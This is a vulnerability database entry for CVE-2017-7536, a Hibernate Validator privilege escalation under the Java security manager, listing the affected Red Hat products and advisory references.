CVE-2017-7536
Summary
| CVE | CVE-2017-7536 |
|---|---|
| State | PUBLIC |
| Assigner | [email protected] |
| Source Priority | CVE Program / NVD first with legacy fallback |
| Published | 2018-01-10 15:29:00 UTC |
| Updated | 2023-11-07 02:50:00 UTC |
| Description | In Hibernate Validator 5.2.x before 5.2.5 final, 5.3.x, and 5.4.x, it was found that when the security manager's reflective permissions, which allows it to access the private members of the class, are granted to Hibernate Validator, a potential privilege escalation can occur. By allowing the calling code to access those private members without the permission an attacker may be able to validate an invalid instance and access the private member value via ConstraintViolation#getInvalidValue(). |
Risk And Classification
Problem Types: CWE-470
NVD Known Affected Configurations (CPE 2.3)
| Type | Vendor | Product | Version | Update | Edition | Language |
|---|---|---|---|---|---|---|
| Operating System | Redhat | Enterprise Linux | 5.0 | All | All | All |
| Operating System | Redhat | Enterprise Linux | 6.0 | All | All | All |
| Operating System | Redhat | Enterprise Linux | 7.0 | All | All | All |
| Application | Redhat | Hibernate Validator | All | All | All | All |
| Application | Redhat | Hibernate Validator | All | All | All | All |
| Application | Redhat | Hibernate Validator | All | All | All | All |
| Application | Redhat | Jboss Enterprise Application Platform | 6.0.0 | All | All | All |
| Application | Redhat | Jboss Enterprise Application Platform | 6.4.0 | All | All | All |
| Application | Redhat | Jboss Enterprise Application Platform | 7.0 | All | All | All |
| Application | Redhat | Jboss Enterprise Application Platform | 7.1 | All | All | All |
| Application | Redhat | Satellite | 6.4 | All | All | All |
| Application | Redhat | Satellite Capsule | 6.4 | All | All | All |
| Application | Redhat | Virtualization | 4.0 | All | All | All |
| Application | Redhat | Virtualization Host | 4.0 | All | All | All |
References
| Reference | Source | Link | Tags |
|---|---|---|---|
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Pony Mail! | MLIST | lists.apache.org | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Malformed Request | BID | www.securityfocus.com | Third Party Advisory, VDB Entry |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Pony Mail! | lists.apache.org | ||
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Enterprise Virtualization Multiple Flaws Let Remote Users Execute Arbitrary Code and Local Users Determine Passwords and Gain Elevated Privileges - SecurityTracker | SECTRACK | www.securitytracker.com | Third Party Advisory, VDB Entry |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| 1465573 – (CVE-2017-7536) CVE-2017-7536 hibernate-validator: Privilege escalation when running under the security manager | CONFIRM | bugzilla.redhat.com | Issue Tracking, Vendor Advisory |
| CVE Program record | CVE.ORG | www.cve.org | canonical |
| NVD vulnerability detail | NVD | nvd.nist.gov | canonical, analysis |
No vendor comments have been submitted for this CVE.
Legacy QID Mappings
- 982289 Java (maven) Security Update for org.hibernate:hibernate-validator (GHSA-xxgp-pcfc-3vgc)